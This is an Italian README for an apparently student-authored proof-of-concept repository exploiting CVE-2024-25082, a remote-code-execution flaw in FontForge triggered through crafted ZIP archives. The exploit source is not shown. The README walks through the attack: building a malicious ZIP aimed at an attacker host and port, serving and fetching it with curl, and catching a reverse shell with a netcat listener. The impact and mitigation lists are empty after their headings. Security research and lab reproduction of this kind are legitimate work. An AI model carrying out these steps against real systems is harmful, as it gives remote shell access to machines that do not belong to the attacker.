
Exploit proof-of-concept per CVE-2024-25082, che dimostra l'esecuzione remota di codice in FontForge tramite archivi ZIP creati ad hoc. Include generatore di payload, laboratorio Docker e documentazione tecnica per la ricerca e l'educazione sulla sicurezza.
Exploit Proof-of-Concept per CVE-2024-25082, una vulnerabilità che colpisce FontForge e consente Esecuzione Remota di Codice (RCE) tramite un archivio ZIP appositamente creato.
Questo repository mostra come la vulnerabilità può essere sfruttata in un ambiente di laboratorio controllato per scopi di ricerca sulla sicurezza e formativi.
La vulnerabilità si verifica a causa di una validazione impropria dei file all'interno degli archivi ZIP, consentendo a un attaccante di eseguire comandi arbitrari sul sistema di destinazione.
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│ └── exploit.zip
├── writeup.md
└── License
File Descrizione
exploit.py Genera il payload ZIP malevolo poc/ Contiene i file proof-of-concept generati writeup.md Spiegazione tecnica della vulnerabilità License
Installa gli strumenti opzionali:
sudo apt install netcat
python3 exploit.py --lhost <Your IP> --lport <Your Port>
Questo genererà un file exploit.zip malevolo.
python3 -m http.server 8080
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip
nc -lvnp <Your Port>
Se ha successo, si dovrebbe ottenere una shell dal sistema target.
Un ambiente vulnerabile riproducibile è fornito all'interno della directory docker/.
Esempio:
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln
Questo consente test sicuri senza influenzare i sistemi di produzione.
Un attaccante in grado di caricare o controllare file ZIP elaborati dall'applicazione vulnerabile può:
Passi di mitigazione consigliati:
Questo repository contiene codice Proof-of-Concept per una vulnerabilità divulgata pubblicamente.
Il codice è fornito esclusivamente per:
NON utilizzare questo codice contro sistemi senza autorizzazione esplicita.
L'autore non si assume alcuna responsabilità per uso improprio o danni causati da questo software.
Moamen Elmaghrabi
Studente di Cybersicurezza
Test di Penetrazione & Sviluppo di Exploit
Questo progetto è concesso in licenza MIT.
Vedi il file LICENSE per i dettagli.